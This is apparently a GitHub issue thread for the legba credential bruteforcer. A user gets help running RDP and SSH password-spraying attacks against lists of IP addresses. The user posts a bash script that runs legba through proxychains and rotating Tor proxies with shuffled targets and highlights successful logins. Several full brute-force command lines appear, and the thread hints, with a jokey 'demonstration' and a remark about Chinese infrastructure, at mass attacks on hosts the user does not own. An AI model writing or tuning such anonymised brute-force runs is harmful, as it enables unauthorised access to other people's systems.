evilsocket / legba

A multiprotocol credentials bruteforcer / password sprayer and enumerator. 🥷
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invalid socket address syntax #15

Closed myusernameis69 closed 11 months ago

myusernameis69 commented 11 months ago


Tryin to run a simple rdp brute and even if I have only 1 ip in my ip file, it always returning syntax error!

root@debian:~# legba -t @/root/rdp_targets.txt --username @/root/admin_userlist.txt --password @/root/passwords.txt --rdp-auto-logon --output /root/LEGBA_GOOD.txt --output-format text --timeout 30000 --retries 5 --retry-time 1000 --concurrency 5 --jitter-min 500 --jitter-max 500 rdp

[INFO ] targeting @/root/rdp_targets.txt Error: "invalid socket address syntax"

Content of rdp_targets.txt is: ip ip ip ip

What is the problem causing this ? Is there any other format for the ip-s in the file ? File contains IPv4 addresses, not 6.


evilsocket commented 11 months ago

-t/--target do not support multiple targets from file, you'll have to use -M/--multiple which is a feature I just pushed on master and not tagged in a release yet

evilsocket commented 11 months ago

PS: the first argument must be the plugin name btw

myusernameis69 commented 11 months ago

Any ETA on releasing it? Btw, does it support targets file for ssh?

Thank you for your quick reply, Kindly appreciate it.

evilsocket commented 11 months ago

@myusernameis69 not really but it shouldn't take long (less than a month probably), just need some time to polish it a bit

evilsocket commented 11 months ago

and yes multi mode supports all plugins

myusernameis69 commented 11 months ago

Hah, perfect!

Well, in that case, did a bash script to work with it, will share it with the world to use a targets list, hope people find it useful.

This script is designed to run Legba with randomized targets using proxychains and highlight successful logins. It is design to offer targets file support. Make sure to configure proxychains properly, test first by removing proxychains from the command. ( I have a multitor setup runing with HUP signal / rotating system / 10 instances to always provide fresh and fast proxies from tor )


# ANSI color codes for coloring output
RED='\033[0;31m'    # Color for failed connection attempts
GREEN='\033[0;32m'  # Color for successful connection attempts and successful logins
NC='\033[0m'        # No Color - reset to default text color

# Paths to the files (Replace with actual paths or provide these as command line arguments)
TARGETS_FILE="path/to/your/targets_list.txt"  # Example: "/home/user/targets.txt"
USERNAMES_FILE="path/to/your/usernames_list.txt"  # Example: "/home/user/usernames.txt"
PASSWORDS_FILE="path/to/your/passwords_list.txt"  # Example: "/home/user/passwords.txt"
OUTPUT_FILE="path/to/your/output_log.txt"  # File where successful connection attempts will be logged
ERROR_FILE="path/to/your/error_log.txt"  # File for logging connection errors

# Configuration for Legba
TIMEOUT=30000  # Example: 15000 for 15 seconds
RETRIES=5      # Example: 3 for three retries
RETRY_TIME=1000  # Example: 5000 for 5 seconds between retries
CONCURRENCY=20   # Example: 50 for fifty concurrent connection attempts
JITTER_MIN=100   # Example: 200 for a minimum of 200 milliseconds random delay
JITTER_MAX=1000  # Example: 3000 for a maximum of 3000 milliseconds random delay

# Read targets into an array and shuffle it
readarray -t TARGETS < "$TARGETS_FILE"

# Function to process each line of output from Legba
process_output() {
    while read -r line; do
        if [[ "$line" == *"result found"* ]]; then
            echo -e "${GREEN}$line${NC}"
            echo "$line"

# Iterate over the randomized target list
for target in "${RANDOMIZED_TARGETS[@]}"
    echo -e "Attempting to connect to ${GREEN}$target${NC}"
    # Run Legba for the current target with proxychains
    proxychains legba rdp -t "$target" --username @"$USERNAMES_FILE" --password @"$PASSWORDS_FILE" --rdp-auto-logon --output "$OUTPUT_FILE" --output-format text --timeout $TIMEOUT --retries $RETRIES --retry-time $RETRY_TIME --concurrency $CONCURRENCY --jitter-min $JITTER_MIN --jitter-max $JITTER_MAX 2>&1 | process_output | tee -a "$ERROR_FILE"

    # Check if Legba succeeded or failed by examining the exit status
    if [ $? -ne 0 ]; then
        echo -e "${RED}Failed to connect to:${NC} $target" | tee -a "$ERROR_FILE"

echo "Script completed."
evilsocket commented 11 months ago

@myusernameis69 released as 0.4.0, check this entry of the wiki https://github.com/evilsocket/legba/wiki/Usage-and-Main-Options#selecting-one-or-more-targets

myusernameis69 commented 11 months ago

@myusernameis69 released as 0.4.0, check this entry of the wiki https://github.com/evilsocket/legba/wiki/Usage-and-Main-Options#selecting-one-or-more-targets

Thanks a lot! Seems like i skipped reading entire wiki, haha :D

Now got this new problem witch I personally consider a bug, i might be dumb, but check this out:

When getting [ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known Even if I started checking 10 ips, it skips the rest returning that 1 address is unsolvable or invalid ( it is valid, but probably can't solve a dns lookup ). It should continue checking the rest of the ips till all 10 is finished, even if error, right ?

[INFO ] targeting,,,,,,,,, [INFO ] username -> string 'root' [INFO ] password -> string '@/root/thc-hydra/passwords.txt'

[INFO ] tasks=100 mem=19.1 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.2 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [ERROR] attempt 2/2: Invalid address was provided: failed to lookup address information: Name or service not known [INFO ] runtime 27.115741663s Already checked: Already checked: Already checked: Already checked: Already checked: ProxyChains-3.1 (http://proxychains.sf.net) legba v0.3.0

[INFO ] targeting,,,,,,,,, [INFO ] username -> string 'root' [INFO ] password -> string '@/root/thc-hydra/passwords.txt'

[INFO ] tasks=100 mem=19.7 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.8 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s [INFO ] tasks=100 mem=19.9 MiB done=0 (0.00%) speed=0 reqs/s

evilsocket commented 11 months ago

what command line are you using? i see you're still passing "@/root/thc-hydra/passwords.txt" which, as I already said, it's wrong .. remove the @ ....

evilsocket commented 11 months ago

From what I see you should be using:

legba ssh -T ",,,,,,,,," --username root --password /root/thc-hydra/passwords.txt

myusernameis69 commented 11 months ago

proxychains legba ssh --target ",,,,,,,,," --username "root" --password "@/root/thc-hydra/passwords.txt" --output "/root/thc-hydra/LEGBA_GOOD_SSH.txt" --output-format "text" --timeout "30000" --retries "2" --retry-time "10000" --concurrency "100" --jitter-min "500" --jitter-max "15000"

evilsocket commented 11 months ago

seems fine apart from the @ ... i can confirm that even if one of the address is not reachable, it does continue with the other ones until completed

evilsocket commented 11 months ago

yep can confirm it behaves as expected:

Screenshot 2023-11-05 alle 23 37 49
evilsocket commented 11 months ago

(someone's targeting chinese infrastructures uh? :D)

myusernameis69 commented 11 months ago

Hahahaha, it's just for "demonstration" purposes :P

Sooo, yes, the problem was coming from @ lol :D, now if that error happens, it just keeps checking the other ips. Amazing tool man :) wish someday i get to your level, love the nickname too.

evilsocket commented 11 months ago

glad we got it working! have fun with your "demonstration" ;)

myusernameis69 commented 11 months ago

Thanks a lot :D

Is there a limit to how many ips can be sent as comma separated ?

evilsocket commented 11 months ago

@myusernameis69 nope, no limit ... but if you have many, I suggest you use a file ( -T "@file-with-ips.txt" .. in this case @ is valid ) ... or an ip range expression ... as the wiki says:

The --target/-T argument supports one or multiple targets expressed as one of the following, or a comma separated list of the following:

myusernameis69 commented 11 months ago

It seems i just can't get it working with @ and as well with ips separated by comas now experiencing problems.

Can you please writ 2 full commands for both as example ? getting totally lost :(

evilsocket commented 11 months ago

legba ssh -T @filename-with-ips.txt --username root --password /root/thc-hydra/passwords.txt

myusernameis69 commented 10 months ago

For past 3 days still figuring out how to increase speed, tried playing and changin values to all options but non helped. Any suggestion on how to make it work faster? Did noly 6k ip's in 28 hours.

myusernameis69 commented 10 months ago

Forgot to mention: [INFO ] tasks=500 mem=20.8 MiB done=6180 (0.06%) errors=6180 speed=0 reqs/s From 6180 checked, 6180 error, that's not right, is it ?

evilsocket commented 10 months ago

you are using too many concurrent requests, i'd suggest you leave the default value and see how it goes